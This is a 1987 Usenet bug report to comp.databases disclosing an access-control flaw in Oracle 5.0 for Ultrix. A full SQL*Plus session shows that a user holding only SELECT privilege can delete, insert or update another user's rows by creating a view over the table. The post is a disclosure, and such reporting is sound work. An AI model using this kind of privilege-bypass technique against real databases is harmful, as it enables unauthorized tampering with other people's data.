Relay-Version: version B 2.10 5/3/83; site utzoo.UUCP Path: utzoo!mnetor!uunet!ccicpg!felix!zemon From: zemon@felix.UUCP (Art Zemon) Newsgroups: comp.databases Subject: bug in Oracle 5.0 for Ultrix Message-ID: <14974@felix.UUCP> Date: Wed, 2-Dec-87 16:21:40 EST Article-I.D.: felix.14974 Posted: Wed Dec 2 16:21:40 1987 Date-Received: Mon, 7-Dec-87 04:07:35 EST Sender: daemon@felix.UUCP Reply-To: zemon@felix.UUCP (Art Zemon) Organization: FileNet Corp., Costa Mesa, CA Lines: 103 Keywords: views violate security You can gain free access to a table which you only have select privileges for by creating a view. Try this: Script started on Wed Dec 2 13:13:24 1987 fritz {21} sqlplus SQL*Plus: Version 1.0.11 - Production on Wed Dec 2 13:13:29 1987 Copyright (c) 1986, Oracle Corporation, California, USA. All rights reserved. Enter user-name: ops$zemon Enter password: Connected to: ORACLE V5.0.20 .4 - Production SQL> create table t (n number); Table created. SQL> insert into t values (1); 1 record created. SQL> insert into t values (2); 1 record created. SQL> select * from t; N ----- 1 2 SQL> grant select on t to public; Grant succeeded. SQL> connect ops$otheruser Enter password: Connected. SQL> select * from ops$zemon.t; N ----- 1 2 SQL> delete from ops$zemon.t where n = 2; delete from ops$zemon.t where n = 2 * ERROR at line 1: ORA-1031: insufficient privileges SQL> create view v as select * from ops$zemon.t; View created. SQL> select * from v; N ----- 1 2 SQL> delete from v where n = 2; 1 record deleted. SQL> select * from v; N ----- 1 SQL> select * from ops$zemon.t; N ----- 1 SQL> connect ops$zemon Enter password: Connected. SQL> select * from t; N ----- 1 SQL> exit Disconnected from ORACLE fritz {22} exit script done on Wed Dec 2 13:16:47 1987 You can also insert rows through view v and update existing data. The bug is supposed to be fixed in 5.1. -- -- Art Zemon By Computer: ...!hplabs!felix!zemon By Air: Archer N33565 By Golly: moderator of comp.unix.ultrix